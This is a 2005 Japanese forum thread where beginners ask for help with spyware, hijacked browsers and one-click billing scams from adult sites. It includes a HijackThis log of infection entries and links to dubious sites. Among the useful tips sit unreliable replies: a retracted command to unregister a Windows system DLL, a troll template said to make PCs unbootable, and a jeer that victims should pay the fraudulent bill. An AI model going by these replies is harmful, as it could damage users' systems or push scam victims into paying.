料金を振り込んでください、と表示されてしまいました。

6の点プレには、架空請求なので気にしない、とありますが、これは
本当に無視しちゃっていいんでしょうか?
ホスト名やIPだけしか表示されず名前や住所は出ませんでした。
まさか業者が家まで来て払え!という事はないですよね?

油断してしまいました・・・いつもはリンクは踏まないようにしてるのに・・・
これ、どうしたらいいんでしょうか?



414 :ひよこ名無しさん:05/02/21 00:59:44 ID:???
>>413
IPアドレスがわからないと通信できない。
http://www.ugtop.com/spill.shtml

415 :ひよこ名無しさん:05/02/21 01:03:03 ID:???
>>410
WORM_BADTRANS.B?
勘違いしてないか?


416 :ひよこ名無しさん:05/02/21 01:14:04 ID:SaMN67Tj
>>414
そのスレ、他にも踏んでしまった方が沢山いるみたいなんです。
リンク先が架空請求のサイトで漏れのホスト名とIPが表示されてしまい
所定の金額を期日までに振り込め、と書いてあったんです。
これは無視しても大丈夫なんですよね?
仮にホスト名やIPが業者に知られたからって、プロバイダが個人情報を教えなければ
漏れの住所とかそういうのも業者には分からないんですよね?

怖くて泣きそうだよ・・・ママソ    

417 :ひよこ名無しさん:05/02/21 01:19:03 ID:???
>>412
効果ありますよ。

418 :ひよこ名無しさん:05/02/21 01:21:01 ID:???
このスレ不親切すぎ
死ね

419 :ひよこ名無しさん:05/02/21 01:23:47 ID:???
nCaseというスパイウェアが駆除できません。
どうやって駆除すればいいのでしょうか?

420 :ひよこ名無しさん:05/02/21 01:24:26 ID:???
>>418
駆除は大変なんだってw

421 :ひよこ名無しさん:05/02/21 02:19:34 ID:???
>416
ここのテンプレが信用できなくて、そんなに心配なら何でこのスレに来たんだw

心配だったら、キチンと料金を払い込んで安心を買うって手段もあるだろ?

422 :ひよこ名無しさん:05/02/21 03:15:30 ID:???
新しいセキュリティホールを使ってインストールさせるスパイウェアがまだ登場していない現在、
ウィンドウズアップデートもしていないで、
インストールされたって騒いでいるやつらは、バカ呼ばわりされる。
ああ 無情!

423 :ひよこ名無しさん:05/02/21 04:11:42 ID:vIRe42VF
ねぇ。不当請求サイトで画面クリックしたら会員登録しました
金振り込めって出てさ、やばいと思ったけどそれから動画ダウンロードしちゃったんだけど
払わなくてもOK?IPとか出たんだけど

424 :ひよこ名無しさん:05/02/21 04:17:11 ID:???
>>423


425 :ひよこ名無しさん:05/02/21 04:25:46 ID:???
こういったサイトは動画にプログラムを仕込ませてあるから、もう逃げられない

426 :ひよこ名無しさん:05/02/21 04:32:24 ID:vIRe42VF
大丈夫だよね?

427 :ひよこ名無しさん:05/02/21 04:38:59 ID:mmH707UQ
すみません。win2000sp2、ノートン2002です。
スレイプニルでアダルトサイトをいろいろ見てたら、
ちょっと嫌な感じになって、(PCのランプがながらくつきっぱなしで、
何かが起こってる感じ)
おさまったと思ったら、IEのツールバーに英語の怪しげなサイトの
ツールバーが勝手に組み込まれていました。

IEを立ち上げると最初のホームページでそこのHPが出て、
アドレスバーのところには
「res://D:\WINNT\system32\shdoclc.dll/navcand.htm」
と出ます。

何が起こったのでしょうか?どうすれば元に戻りますでしょうか?
どうかご教示ください。

428 :ひよこ名無しさん:05/02/21 04:42:52 ID:vIRe42VF
ツール、インターネットオプション
ホームページの設定じゃない?
設定できなかったらアドウェアとかでスパイウェア除去してみれば

429 :ひよこ名無しさん:05/02/21 04:51:32 ID:???
>>427
.dllファイルがインストールされているようだから
regsvr32 /u "D:\WINNT\system32\shdoclc.dll"
まずこれをやって再起動してみな

430 :ひよこ名無しさん:05/02/21 04:52:44 ID:???
>>426
自動登録されただけなら無視しとけばいいだけの話だが、動画を再生したのなら言い訳は出来ない。

431 :ひよこ名無しさん:05/02/21 04:53:46 ID:???
>>426
残念だが、>>430の言うとおり。

432 :ひよこ名無しさん:05/02/21 05:25:27 ID:UBylBSMd



433 :ひよこ名無しさん:05/02/21 05:47:32 ID:vIRe42VF
マジで?じゃあ請求来ない事願うだけなの?

434 :ひよこ名無しさん:05/02/21 05:56:29 ID:???
>>433
怪しげなエロサイトでダウンロードなんか普通はしないよ。ヌケる保証もない。
まぁ俺ぐらいスケベになってくると安全でヌケる動画が判断できるんだが。
君はまだ修行が足らないよ。

435 :ひよこ名無しさん:05/02/21 05:58:40 ID:???
そこでwinnyですよw

436 :ひよこ名無しさん:05/02/21 06:04:15 ID:???
>>435
だましにも慣れてくると超一流だよな。
口説き文句に惑わされない! これだよ。

437 :427:05/02/21 08:18:52 ID:R+qN/nNU
>>429
>regsvr32 /u "D:\WINNT\system32\shdoclc.dll"
>まずこれをやって


 これをやって、って、どうやればよいのでしょうか?

438 :ひよこ名無しさん:05/02/21 08:32:27 ID:???
>>437
スタートからファイル名を指定して実行からそのコマンドを実行する。
しかし、まず自分で調べて何のことなのか理解しないと
HDDあぼーんコマンドすら信用して実行する羽目になる。
なぜ>>2-4をみてやろうとしないのか?

439 :427:05/02/21 08:37:01 ID:R+qN/nNU
スパイぼっと、AD〜でのスキャン
ノートンでのスキャン
IEの設定変更

は、やりますた。

で、http://pcq.furu.org/thread.php?thread=55549
ここを見つけてAVGというのをインストールしようとしたのですが、
ダウンロードはできたものの、うまくインストールできません。

ログインは半角英数の管理者権限者でしてるのに、なんでなんだろ。。

440 :ひよこ名無しさん:05/02/21 08:50:42 ID:vIRe42VF
俺が見たサイトは明らかなワンクリ業者
だからその時点で契約は無効
動画をダウンしちゃったけど無効だから大丈夫なはず
異論、反論ある?

441 :ひよこ名無しさん:05/02/21 08:53:34 ID:???
>>439
うまくインストールできないとは?そう言われても意味が分からないよ?

442 :ひよこ名無しさん:05/02/21 09:03:56 ID:???
>>437
おっと、すまんかった
それって、ウィンドウズのシステムファイルじゃないか
勘違い やるなよ
プロパティを表示して、
本当にウィンドウズのファイルなのかを確認した方がいい

443 :ひよこ名無しさん:05/02/21 09:11:53 ID:???
>>442
うるせぇβακα..._〆(゚▽゚*)

444 :ひよこ名無しさん:05/02/21 09:21:11 ID:???
>>437
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs
このレジストリキーを調べた方がいい
○res://shdoclc.dll/navcancl.htm
×navcand.htm
これが正解なんだと思うよ

445 :ひよこ名無しさん:05/02/21 09:26:19 ID:???
>>437
http://www.symantec.com/region/jp/avcenter/venc/data/trojan.errhijack.html

446 :ひよこ名無しさん:05/02/21 10:18:54 ID:???
>>440
自分でそう思うのならそれでいいんじゃないの?
ワンクリサイトで動画なんか落としたことないから、
どうなるか知らん。
落としたファイルにトロイなんか仕掛けられてないといいけど。

ttp://www.trendmicro.co.jp/hcall/index.asp
いちお、ここでチェックしてみろ。
用心するに越したことはない。

447 :ひよこ名無しさん:05/02/21 10:22:08 ID:???
>>440
一つ忘れた。
トロイ系のやつが入っていたら既に手遅れ。
情報は取られてると思った方がいい。
住所や電話が分かるかどうかは、おまいのPCの使い方によるな。

448 :ひよこ名無しさん:05/02/21 10:54:19 ID:NtCz1xhf
18やったら起動しなくなった

449 :ひよこ名無しさん:05/02/21 15:58:03 ID:???
アダルトサイトにアクセスしたとき色々貰ってしまったようで

自力で削除できるものはあらかた削除したのですが
アプリケーションの削除に現れる

Best Search Engine!!!というアプリケーションを削除しようとしても
『boln.dllにエラーが発生しました。エントリがありません』という
メッセージが表示されて削除することが出来ません。

boln.dllを削除しようとしてもWindowsで使用中のために削除不可能でした。

グーグルで検索したのですが解決法がまったく見つからず
此処にお知恵をお借りしようとおもい書き込ませていただきました。

OSはMeを使用しております。セキュリティソフトはSoybotとSpywareBlasterで
ウィルス対策ソフト等は入っておりません。

450 :449:05/02/21 16:37:16 ID:???
削除したとおもっていたファイルですが

起動直後は何とも無いのですが
しばらくするとさまざまな.exeファイルが作成され
勝手に起動しております。

使用モデムを登録させるようなアプリケーションが
勝手に動いたりエクスプローラーがタスクマネージャー上でいくつも
起動されていたり、お気に入りにが勝手に増えていたりします。

修復方法がまったく見えてきません、どなた様か
お力添えお願いいたします。

451 :ひよこ名無しさん:05/02/21 16:41:02 ID:???
>ウィルス対策ソフト等は入っておりません。
こんなことで直してくださいとは虫のいい話。出直して来なさい。


452 :ひよこ名無しさん:05/02/21 16:43:44 ID:???
>>451
すみません。一応オンラインのウィルススキャン等は行っております。

その結果表示されたウィルス等は自力で削除したつもりなのですが・・・

453 :449:05/02/21 16:51:37 ID:???
やっぱり出直してきます
ありがとうございました

454 :ひよこ名無しさん:05/02/21 17:33:39 ID:???
>>448
ウソだ!

455 :ひよこ名無しさん:05/02/21 17:44:29 ID:???
>>451
俺もウイルス対策入れてないけど何か?

456 :ひよこ名無しさん:05/02/21 17:50:12 ID:???
>>449
セーフモードで起動してレジストリエディターを使う。
タスクマネージャーで該当ファイルのタスクを終了させて削除。
関連すると思われるファイルに読むかぎりではEXEファイルがあるはず。
これを必ず削除する。

457 :ひよこ名無しさん:05/02/21 18:10:59 ID:DyQGahXe
【総合】スパイウェア予防駆除 Part6

54 :名無しさん@お腹いっぱい。 :05/02/21(月) 18:01:00
スパイウェアなど恐るるに足らず。
何故ならスパイウェアに感染しても、↓をやれば必ず消えるから。
エロサイト見たら…助けて下さい!Part50
http://pc5.2ch.net/test/read.cgi/pcqa/1108272727/12-19
その中の「真・パソコンのトラブル解消法」はすごい効果を発揮。
スパイが消えたという報告多数あり。

この人セキュ板にまで出張してるんだね

458 :ひよこ名無しさん:05/02/21 18:13:05 ID:???
>>457
起動しなくなるから。ウィルスが止まるから。
確かに究極のセキュリティだな。

459 :ひよこ名無しさん:05/02/21 18:16:25 ID:???
家ごと焼いちゃえば解決

460 :ひよこ名無しさん:05/02/21 18:22:13 ID:???
>>450
インターネットオプションの全般タブ
オブジェクトの表示 
ダウンロードされたアクティブXコントロールのキャッシュがここにある
怪しいのを右クリックしてプロパティを表示させると、
ID: 数字の羅列があると思う
これがインストールされた.DLLファイルなどのCLSID
レジストリをこの数字で検索して全部削除する

461 :ひよこ名無しさん:05/02/21 18:50:33 ID:???
>>450
こんな方法もある
例えば、Windows Update WUWeb.dll ActiveX controlだと
clsid={6414512B-B978-451D-A0D8-FCFDF33E833C}
レジストリ内をこれで検索すると
HKEY_CLASSES_ROOT\CLSID\{6414512B-B978-451D-A0D8-FCFDF33E833C}
このキーが最初にヒットする
この下にあるInprocServer32のキーを展開すると
C:\WINDOWS\system32\wuweb.dll
このファイルが本体であることがわかる
ファイルとレジストリの登録を削除するには、
regsvr32 /u C:\WINDOWS\system32\wuweb.dll
コマンドプロンプトでこれを実行する

462 :450:05/02/21 19:13:31 ID:???
>>460

ダウンロードされた奴を全て消しても
しばらくインターネットに繋いでいると勝手に落としてきて
インストールしてしまうようなのです。

AVGで検索したところトロイのダウンローダーみたいな
ウィルスが見つかったのでそれを削除。

また、spybotでスパイウェアを削除してもどうにも直りません。

起動時にboln.dllがエラーを起こしたみたいなメッセージが出るので
それが怪しいと思いまして、削除試みたのですが
ウィンドウズで使用中と出てまったく削除できません。

463 :ひよこ名無しさん:05/02/21 19:27:55 ID:???
自分の知ってることを羅列しただけのような回答が目立つな。
初心者はアダルトサイト被害対策の部屋を真面目に読んで実行することだ。
そのうえでわからないことを聞けばいい。決め打ちでなおると思うのが初心者の浅はかさ。

464 :ひよこ名無しさん:05/02/21 19:32:27 ID:???
boln.dllで検索するとかなり出てくるんだが、見ても解らないんだろうな。

465 :ひよこ名無しさん:05/02/21 19:34:45 ID:???
>>462
とりあえずSpybotとAd-Awareはセーフモードで両方やってくだちい
>>464
そんなやつのための場所だが

466 :ひよこ名無しさん:05/02/21 19:40:54 ID:tvgKRlN2
ttp://www.01hit.com/catalog/product_info.php?products_id=10948
↑ここを見てしまったんだけど大丈夫?
アカウントが中断されましたって出たんだけど

467 :ひよこ名無しさん:05/02/21 19:48:48 ID:???
>>460>>461で見つかったアクティブXコントロールの.dllや.ocxが親玉である確率は高いぞ
これを最初に削除してしまわないと、再起動でシステムに組み込まれる
プロの俺が言うんだから間違いない
それから、各々のインストールされたものを削除する

468 :ひよこ名無しさん:05/02/21 19:53:31 ID:???
>>462
それならセーフモードで起動して
レジサーバーを実行すればいいじゃない
boln.dll

469 :ひよこ名無しさん:05/02/21 19:56:18 ID:???
だからさ、初心者にレジサーバーつって分かるとでも思ってんのか、おっさん

470 :ひよこ名無しさん:05/02/21 19:58:37 ID:cg2GgXVZ
ググってもレジサーバー出てこなかったのですが
よろしければ詳しくお願いします

471 :ひよこ名無しさん:05/02/21 20:01:32 ID:???
誰だお前

472 :ひよこ名無しさん:05/02/21 20:08:56 ID:???
>>470
レジストリエディタを起動したら、検索機能を使って
boln.dllを検索する
regsvr32 /u C:\〜〜〜\boln.dll
ファイルのフルパスがわかったら、それを入力する
/u このオプションがアンインストールの指示

473 :ひよこ名無しさん:05/02/21 20:11:13 ID:???
わざわざコマンド使わなくても,、HijackThisでFixすればいいやん。
バックアップも自動で取れるし。

474 :ひよこ名無しさん:05/02/21 20:11:31 ID:???
>>470
この程度の事出来ないと、被害者対策の部屋を参考にしても
全部取り除けないぞ
boln.dllはウィンドウズのシステムファイルではない
さっさと削除してしまえ
無理だと思ったら、リカバリーしろ

475 :ひよこ名無しさん:05/02/21 20:22:09 ID:???
初心者スレ

476 :ひよこ名無しさん:05/02/21 20:23:45 ID:???
申し訳ないですageてしまいました。

あと少しのところまできていると思いますので
頑張ります。みなさまさまざまな助言、アドバイス大変ありがとうございました。

477 :ひよこ名無しさん:05/02/21 20:28:15 ID:???
質問者はあげ。 >>1 読んで‥ほんとに

478 :ひよこ名無しさん:05/02/21 21:03:54 ID:???
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

479 :ぼるじょあ ◆yBEncckFOU :05/02/21 21:13:38 ID:???

(・3・) エェー よいこの質問待ってるYO♪

ぼるじょあ(・3・)質問箱 セキュ板出張所12
http://pc5.2ch.net/test/read.cgi/sec/1105933333/

ウィルス情報&質問 総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/

セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/

【総合】スパイウェア予防駆除 Part6
http://pc5.2ch.net/test/read.cgi/sec/1108613740/

(・3・) エェー よいこの相談待ってるYO♪

480 :ひよこ名無しさん:05/02/21 22:05:01 ID:???
ヤフーのトップページから検索するといきなり英語になってしまい
ネットができません。
(2chはマイリンクに登録してあるから見れる)

ttp://ime.nu/ime.nu/www2.strangeworld.org/uedakana/sahra6147.jpg
ついこないだ↑のリンクを踏んでしまいそっからPCがおかしくなりました
どうすればいいんでしょうか?


481 :ひよこ名無しさん:05/02/21 22:08:01 ID:???
恐ろしく古いネタだ

482 :ひよこ名無しさん:05/02/22 12:31:13 ID:8UxRofJg
助けてください。

OS:WinXP ブラウザ:IE セキュリティソフト:無し
一昨日、友達の弟がエロサイトで何かやったらしく
昨日PC起動中にウイルスが実行され、
C:¥直下や[スタート]メニューの[プログラム]の所など数箇所に
124718.exeというファイルがコピーされ、
デスクトップにはそのショートカットが作成されてました。
IEを起動しようとしたのですが警告ウィンドウが出てしまい、使用不可になってました。
PCの電源を切る時もIEXPLORE.EXEが応答せずとなって
正常には落せませんでした。

当方は本人では無く、代理で書きこませていただいております。
その点は大変申し訳ありませんが、何卒ご教授のほどお願いします。



483 :ひよこ名無しさん:05/02/22 12:32:44 ID:???
>>482
代理質問は禁止だよ
どーしてもつーんなら藻前がテンプレ読んで教えてやりな

484 :482:05/02/22 12:39:39 ID:8UxRofJg
>>483
お叱りもっともです。申し訳ありませんでした。

スレ汚しスマソ

485 :ひよこ名無しさん:05/02/22 17:13:10 ID:L4aZNM9g
OS:98 ブラウザ:IE 接続状況:CATV アンチウイルス:なし
症状:起動の度にtibsとかいうスパイウェア?が働き、エロサイトへの案内
ページのようなものが開く。アイコンも出来てる。
IEのホームが何度修正してもhttp://213.159.117.134/index.phpになる。

取った対策:7)のスパイボート使用。スパイウェア削除。
マイコンピュータ内の怪しいファイル削除。アイコン削除。
1)、2)、3)実行できたが、インターネットオプションを一度開くと
ページの応答がなくなり、Ctrt+Alt+Deleteでないとページが閉じられない。
4)は新アプリ発見できず。
5)、6)、9)、10)は証明書等が開くとやはり応答がなくなり、
スキャンや駆除のツールがダウンロードできない状態。
再起動させても症状はそのまま。

よろしくお願いします。

486 :ひよこ名無しさん:05/02/22 17:29:19 ID:???
>>485
ここ見れるか? 作業はセーフモードで。
http://www.higaitaisaku.com/remove213159.html

487 :485:05/02/22 18:35:37 ID:L4aZNM9g
>>486
9)、10)の時点でも試したんですが、CWShredderもHijackThisも
ダウンロードできなかったので無理でした。
セーフモードだとネットにつながりませんし。

488 :ひよこ名無しさん:05/02/22 19:39:25 ID:zuZvb+GG
OS:WinXP ブラウザ:IE セキュリティソフト:ノートン

最近アダルト見てたせいなのか、たまに
「NEW OFFER FOR YOU!」という小さいウィンドウが出てきます。
突然出てきますし、ノートンも反応しません。
一応テンプレの>>2をやりましたが、これで大丈夫でしょうか?

489 :ひよこ名無しさん:05/02/22 19:41:51 ID:???
>>488
SpybotなりAd-awareなりでチェックしろよ禿

490 :ひよこ名無しさん:05/02/22 19:42:40 ID:???
>>487
んじゃ、まずは
常駐ソフトをできるだけ切って再起動 > レジストリエディタ 
最初に レジストリ>レジストリファイルの書き出しでバックアップをとる
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run までいって
レジストリの部分書き出しを行う。 できたファイルをメモ帳で開いてここに貼りつけて。

491 :ひよこ名無しさん:05/02/22 20:16:00 ID:???
>>485=487
もう手遅れだから、ここの真のテンプレ(>>12-19)をやれ。
その後、OSクリーンインストールしろ。
俺の云うことを信じろ。

492 :ひよこ名無しさん:05/02/22 20:20:39 ID:yNvADZez
質問します。
パソコンを使ってネットに繋いでアダルトサイトを見ていました。
再起動すると、何もありませんでした。
ごまんなさい。

493 :ひよこ名無しさん:05/02/22 20:25:17 ID:???
ウイルスだな

494 :ひよこ名無しさん:05/02/22 20:35:40 ID:yNvADZez
ウィルス常駐ソフトは入ってませんけど、ウィルスには感染していないと思います。
起動できるのが証拠です。

495 :ひよこ名無しさん:05/02/22 20:36:28 ID:wZhlHuwD
http://kamibayasi.fc2web.com/afrieitlink.html

496 :ひよこ名無しさん:05/02/22 20:36:54 ID:???
何もない

だがそれがいい

497 :ひよこ名無しさん:05/02/22 20:47:28 ID:???
寄生虫は理由もなく宿主を殺さないもんだ

498 :ひよこ名無しさん:05/02/22 21:00:19 ID:yNvADZez
どうして?
ウィルスに感染したらパソコンが壊れるんでしょ。
よく映画でやってるじゃありませんか、画面に海賊旗が出てきて、
「ハ〜ハ〜ハ!」と不気味に笑った次の瞬間、
パソコンの画面が粉々に砕け散るというシーンが。

499 :485:05/02/22 21:47:23 ID:L4aZNM9g
>>490
結構やばいみたいです。
レジストリエディタ開いてもすぐに止まって入力受け付けてくれません。

500 :ひよこ名無しさん:05/02/22 21:49:20 ID:???
>>499
リカバリしろ!
おまいには無理だと思う、気の毒だが。

501 :ひよこ名無しさん:05/02/22 21:51:08 ID:???
なんか大事なもの消しちゃったくさいね

502 :ひよこ名無しさん:05/02/23 00:14:37 ID:7AsJopJn
hardcoreteensxという電話のアイコンが出て、駆除ソフト使っても
復元してしまうのですが、自力で解決された方はおられるんですか?
ググっても具体的な対策がでないので

503 :ひよこ名無しさん:05/02/23 00:15:38 ID:???
>>502
アフォは帰れ

504 :ひよこ名無しさん:05/02/23 02:47:58 ID:???
>>502
Hardcore Teen Sex - hardcoreteensex - Free Pics and Movies!
これか?

505 :ひよこ名無しさん:05/02/23 06:36:30 ID:???
>>499
セーフモードで起動して、
>>490-491
実行してみろ。

506 :ひよこ名無しさん:05/02/23 06:44:27 ID:???
wwwwwテラワロスwwwww

ttp://moe2.homelinux.net/src/200502/20050218505803.jpg
ttp://moe2.homelinux.net/src/200502/20050213475531.jpg
ttp://moe2.homelinux.net/src/200502/20050219510999.jpg

507 :_:05/02/23 13:23:29 ID:f5C0mO1g
すいません。
ttp://www.uraav.com/av/actress.php?actress_abb=M
ここに裏ビデオのキャプチャーがあるんですけど
これを見ていて、普通に見れていたんですけど
もうネットを終了しようとして、終了したんです。
そして何時間かたって、再び起動して
ダイヤルアップ接続をしようとしたら、全然繋がらないのです。
そしてよく見てみると、電話番号もパスワードも変なものに
なっていました。
そして何とか普通のパスワードとかに戻す事ができたのですが
このサイトに、使用請求とかされないか心配です。
このサイトを見ている時は、ダイヤルアップは接続されたまま
だったからです。
この現象をどう思うか、教えてください。



508 :ひよこ名無しさん:05/02/23 14:22:49 ID:???
>>507
全部見たんですか?スケベですね。
ひとつ見てみましたが、何ともありませんでした。
どれかのリンクが罠にでもなっていたのでしょうか。
しっかりと対策をしてからいきましょうね。

509 :_:05/02/23 14:27:50 ID:f5C0mO1g
>>508
ちょっとダイヤルアップ接続を切ってみて、
再びつないでみてください。
何かありませんか?


510 :ひよこ名無しさん:05/02/23 14:31:32 ID:???
ダイヤルアップって・・・

511 :_:05/02/23 14:34:23 ID:f5C0mO1g
>>510
ダイヤルアップではないんですか?

512 :ひよこ名無しさん:05/02/23 14:37:25 ID:???
           _____________
   ___   /
 /´∀`;:::\< 呼んだ?
/    /::::::::::| |
| ./|  /:::::|::::::| \_____________
| ||/::::::::|::::::|


513 :ひよこ名無しさん:05/02/23 14:37:50 ID:???
今どき ダイヤルですか? プ 今の時代はプッシュですよ

514 :_:05/02/23 14:48:16 ID:f5C0mO1g
>>513
>>507の危険性はないですか?


515 :ひよこ名無しさん:05/02/23 14:51:57 ID:???
国際電話トラップはいずれにせよ踏み倒せない
今更あーだこーだ言っても後の祭り

516 :ひよこ名無しさん:05/02/23 14:52:53 ID:???
>>514
http://www3.plala.or.jp/hiro-mg3920/tel3.html
ここにあるようなダイアログ出てこなかった?「はい」を押したらおしまいだよ。

517 :_:05/02/23 14:57:41 ID:f5C0mO1g
>>516
そういうのは、何度も出てきた事がありますが
>>507のサイトではでてきませんでした。
ちなみに、それをはいを押した事はあるんですけど
何か悪影響はあるんですか?

518 :ひよこ名無しさん:05/02/23 15:02:29 ID:???
>>517
上のリンクを見ても画像しか見ないのね。
あなたがやられる理由がなんとなく分かりますた。
とりあえずスレの最初の方から読み進めていってください。

519 :ひよこ名無しさん:05/02/23 15:13:53 ID:PRTKQyLx
ttp://secretroom.v37.jp/_mmx_/movie/?id=0&d=ryushutsu3&n=ryushutsu3_1_05.wmv
これを開いてしまったんですが・・・
勝手に登録してしまっていたらどうしましょ・・・;;

520 :ひよこ名無しさん:05/02/23 15:41:45 ID:???
危険かもしれないものを事前情報なしに開けというのは
とても怖いことだと思いませんでしょうか。

521 :ひよこ名無しさん:05/02/23 16:34:57 ID:SylVsiBu
アングラなサイトにとんだらSEXのアイコンがデスクトップに消しても消しても
現れてします。勝手にエロサイトに飛ぶやつがインストされてしまい、
非常に危険な状況に陥りました。スタートプログラムの上にもアイコン
がでてきて、プロパティでどこにあるか調べてSEXのフォルダごとゴミ箱にいれても
再起動後によみがえってしまいます。コントロールからいってプログラムごと削除
のところにはエロらしいのはみえないのですが・・・どうすればいいでしょうか?
身内がかえってくる時間まで後わずかしかないです。変態の烙印を
押される前に、どうにかしたいです。OSは、XPです。よろしくおねがしますT_T

522 :ひよこ名無しさん:05/02/23 16:45:49 ID:???
>>521
スパイウェア
>>2-

523 :ひよこ名無しさん:05/02/23 16:55:34 ID:???
>>521
「いや〜、ウイルスにやられちゃってリカバリするしか無くなってね‥」

っていうセリフを練習しながらリカバリ

524 :521:05/02/23 16:58:12 ID:SylVsiBu
システム復元で解決しました。ありがとうどす。

525 :ひよこ名無しさん:05/02/23 17:42:32 ID:???
>>517
電話代が急に高額になってない?

526 :失礼して・・・:05/02/23 20:08:15 ID:u7dV678I
あげます!あげます!

527 :ひよこ名無しさん:05/02/23 20:29:01 ID:dXeGrAgH
どなたかHDDの初期化のやり方を教えてください。
お願いします。

528 :ひよこ名無しさん:05/02/23 20:33:27 ID:???
>>527
ちょっと勉強してからまたおいで

529 :ひよこ名無しさん:05/02/23 21:31:40 ID:???
ここの>>17をやったら、ウィルスは消えたんですけど、
exe関連のファイルが開けなくなってしまいました。
>>14-15をやっても効果がありませんでしたので、>>17をやりました。
起動できなくなると思ったけど、ちゃんと起動できています。
しかし、exeファイルが開けなくなり困っています(T_T)
良い知恵をお貸し下さい。

530 :ひよこ名無しさん:05/02/23 22:27:22 ID:AqgwINOx
OSはXPです。
デスクトップにFree XXXていうアイコンが出て、消しても消しても再起動すると出てきて
HPも書き換えられてしまいます。
スパイボットとAd-awareもどちらも更新して使いましたが、未だに直りません。
どうかお助けください。


531 :ひよこ名無しさん:05/02/23 22:45:48 ID:???
>>530
セーフモードでスパイボットとAd-awareを使う

532 :530:05/02/23 23:59:42 ID:AqgwINOx
>>531
やってみましたが変わりませんでした。

533 :ひよこ名無しさん:05/02/24 00:00:14 ID:???
>>532
嘘はやめなさいや

534 :ひよこ名無しさん:05/02/24 00:01:19 ID:???
>>532
コンボかな。
HijackThisでログ取ってみれば?

535 :530:05/02/24 00:04:11 ID:AqgwINOx
嘘ではありません。
HijackThisを使ってみます。

536 :530:05/02/24 00:07:02 ID:AqgwINOx
Logfile of HijackThis v1.97.7
Scan saved at 0:04:30, on 2005/02/24
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\ezSP_Px.exe
C:\WINDOWS\System32\systime.exe
C:\Program Files\Messenger\msmsgs.exe

537 :530:05/02/24 00:07:55 ID:AqgwINOx
C:\Documents and Settings\   \Application Data\sрrвр.exe
C:\WINDOWS\System32\systime.exe
C:\Program Files\CASIO\Photo Loader\Plauto.exe
C:\Program Files\PowerPanel\Program\PcfMgr.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Trend Micro\Virus Buster 2004\Tmntsrv.exe
C:\Program Files\Trend Micro\Virus Buster 2004\tmproxy.exe
C:\Program Files\Sony\VAIO Media Music Server\SSSvr.exe
C:\Program Files\tora3\2chtubo\tubo\_2chtubo.exe
C:\Program Files\Sony\Photo Server 20\appsrv\PicAppSrv.exe
C:\WINDOWS\wanmpsvc.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\SV_Httpd.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\sv_httpd.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\UPnPFramework.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\UPnPFramework.exe
C:\Program Files\Trend Micro\Virus Buster 2004\PccPfw.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\   \デスクトップ\HijackThis.exe

538 :ひよこ名無しさん:05/02/24 00:08:13 ID:???
これ、ここの関係者がつくったん?
ttp://foffo-gunkanmaki.hp.infoseek.co.jp/mini/20040901.html

>>530 も参考にするとええよ

539 :530:05/02/24 00:08:41 ID:hY+nP/j2
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O1 - Hosts: 127.0.0.3 www.greg-tut.com
O1 - Hosts: http://213.159.117.133/dkprogs/hosts.txt
O2 - BHO: (no name) - {0F9561D0-03B2-44a3-89A6-E95E417CBA25} - C:\WINDOWS\cerbmod.dll
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {CC378B83-9577-44D0-B4F8-0DD965E176FC} - C:\Program Files\eSyndicate\esyn.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [xAkf2DFq.exe] C:\documents and settings\
O4 - HKLM\..\Run: [SysTime] C:\WINDOWS\System32\systime.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Bhao] C:\Documents and Settings\
O4 - HKCU\..\Run: [SysTime] C:\WINDOWS\System32\systime.exe
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O8 - Extra context menu item: ⇔ このページの更新をmypopで通知する by mypop - file:///C:/Program%20Files/UCAST/Free2/
O8 - Extra context menu item: ⇔ 選択した文字列をマイキーワードに追加する by mypop - file:///C:/Program%20Files/UCAST/Free2/

540 :530:05/02/24 00:10:30 ID:hY+nP/j2
O15 - Trusted Zone: *.clickspring.net
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.slotchbar.com
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.ysbweb.com
